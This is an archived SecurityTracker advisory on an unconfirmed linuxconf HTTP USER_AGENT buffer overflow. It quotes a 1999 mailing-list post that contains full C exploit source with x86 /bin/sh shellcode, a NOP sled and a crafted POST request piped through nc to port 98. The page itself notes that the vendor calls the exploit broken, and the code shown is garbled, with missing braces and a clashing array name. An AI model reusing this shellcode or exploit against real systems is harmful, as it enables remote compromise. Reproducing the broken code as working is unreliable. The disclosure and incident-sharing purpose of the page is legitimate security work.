SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Linuxconf Vendors:  Gelinas,Jacques et al
Linuxconf USER_AGENT Potential Buffer Overflow May Permit Remote Code Execution
SecurityTracker Alert ID:  1009166
CVE Reference:  CAN-2000-0017   (Links to External Site)
Date:  Feb 23 2004
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Description:  In December 1999, a potential buffer overflow vulnerability was reported in linuxconf. A remote user may be able to execute arbitrary code on the target system.

An exploit [contained in the Source Message] that purports to trigger a buffer overflow in the processing of the HTTP USER_AGENT field was reported.

[Editor's note: As posted in 'http://lwn.net/1999/1223/a/linuxconfresponse.html', the vendor was unable to reproduce the vulnerability. The vendor also notes that the exploit is broken. The CVE entry for this item (CAN-2000-0017) lists 4 'NOOP' votes and 2 'REJECT' votes.]
Impact:  A remote user may be able to execute arbitrary code on the target system.

[Editor's note: This vulnerability is unconfirmed.]
Solution:  This vulnerability is unconfirmed.
Vendor URL:  www.solucorp.qc.ca/linuxconf/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Elias Levy <aleph1@SECURITYFOCUS.COM>
Message History:   None.

 Source Message Contents
Date:  Tue, 21 Dec 1999 10:31:14 -0800
From:  Elias Levy <aleph1@SECURITYFOCUS.COM>
Subject:  (Possible) Linuxconf Remote Buffer Overflow Vulnerability

 

There may exists a buffer overflow vulnerability in the Linuxconf package
shipped with some version of Linux systems. The vulnerability may
be in the program's handling of HTTP headers. Initial testing with
Linuxconf 1.16r10 under RedHat 6.0 was inconclusive. If other can
test the exploit and report their results it would be appreciated.

This is an example of what good can happen from sharing security
incident information. There have been reports in the INCIDENTS mailing
list for several months now of scans for port 98. Since no
publicly known major vulnerabilities existed in this service the
traffic was somewhat strange. After some digging around
Jon Starnaud <jon.starnaud_at_rci.com> was able to find this exploit.

If you are not subscribed to INCIDENTS and wish to share incident
information I suggest you sign up. If the vulnerability does exists
this would be the second vulnerability we discover thanks to sharing
incident information (the first one being sadmind).

http://www.securityfocus.com/forums/incidents/faq.html

/*

   linuxconf exploit by R00T-X (c) 1999

   USER_AGENT overflow x86
   should work on all linux's but you need to have
   network access to linuxconf

   greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P

   have fun with this but for EDUCATIONAL PURPOSES :)

   Usage: (./linexp <offset>;cat)| nc targethost 98

  */

char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe8\xc0\xff\xff\xff/bin/sh\x00";

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 1025
#define NOP 0x90

void
main (int argc, char *argv[])
 
   char buf[BUFLEN];
   int offset,nop,i;
   unsigned long esp;
   char shell[1024+300];

   if(argc < 2)
   {
   fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]);
   exit(0);
   }

   nop = 511;
   esp = 0xefbfd5e8;
   offset = atoi(argv[1]);

   memset(buf, NOP, BUFLEN);
   memcpy(buf+(long)nop, shell, strlen(shell));

   for (i = 256; i < BUFLEN - 3; i += 2)
{ *((int *) &buf[i]) = esp + (long) offset;
      shell[ sizeof(shell)-1 ] = 0;
 

  printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN);
   for (i = 0; i < BUFLEN; i++)
     putchar(buf[i]);

   printf("\r\n");

   return;
 

--
Elias Levy
Security Focus
http://www.securityfocus.com/


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC